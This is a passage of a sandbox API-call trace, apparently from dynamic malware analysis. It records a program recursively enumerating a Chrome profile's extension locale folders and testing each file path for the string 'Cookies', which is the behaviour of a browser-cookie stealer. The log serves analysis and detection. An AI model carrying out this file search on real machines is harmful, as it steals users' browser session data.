lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\" [0163.367] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\") returned 141 [0163.367] lstrlenW (lpString="messages.json") returned 13 [0163.367] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\" [0163.367] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" [0163.367] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json", lpSrch="Cookies") returned 0x0 [0163.367] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab6050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.367] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.367] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0163.367] lstrcmpiW (lpString1="pt_PT", lpString2=".") returned 1 [0163.367] lstrcmpiW (lpString1="pt_PT", lpString2="..") returned 1 [0163.367] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.367] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.367] lstrlenW (lpString="\\") returned 1 [0163.367] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.367] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.367] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.367] lstrlenW (lpString="pt_PT") returned 5 [0163.367] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.367] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" [0163.367] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" [0163.367] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*.*" [0163.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.368] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.368] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.368] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.368] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.368] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab6050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.368] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned 140 [0163.368] lstrlenW (lpString="\\") returned 1 [0163.368] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" [0163.368] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\" [0163.368] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\") returned 141 [0163.368] lstrlenW (lpString="messages.json") returned 13 [0163.368] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\" [0163.368] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" [0163.368] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json", lpSrch="Cookies") returned 0x0 [0163.369] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab6050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.369] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.369] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ro", cAlternateFileName="")) returned 1 [0163.369] lstrcmpiW (lpString1="ro", lpString2=".") returned 1 [0163.369] lstrcmpiW (lpString1="ro", lpString2="..") returned 1 [0163.369] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.369] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.369] lstrlenW (lpString="\\") returned 1 [0163.369] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.369] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.369] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.369] lstrlenW (lpString="ro") returned 2 [0163.370] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.370] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" [0163.370] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" [0163.370] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*.*" [0163.370] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.370] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.370] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.370] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.370] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.370] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.370] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned 137 [0163.370] lstrlenW (lpString="\\") returned 1 [0163.371] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro" [0163.371] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\" [0163.371] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\") returned 138 [0163.371] lstrlenW (lpString="messages.json") returned 13 [0163.371] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\" [0163.371] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" [0163.371] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json", lpSrch="Cookies") returned 0x0 [0163.371] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85add150, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.371] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.371] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85adb210, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85adb210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85adb210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ru", cAlternateFileName="")) returned 1 [0163.371] lstrcmpiW (lpString1="ru", lpString2=".") returned 1 [0163.371] lstrcmpiW (lpString1="ru", lpString2="..") returned 1 [0163.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.372] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.372] 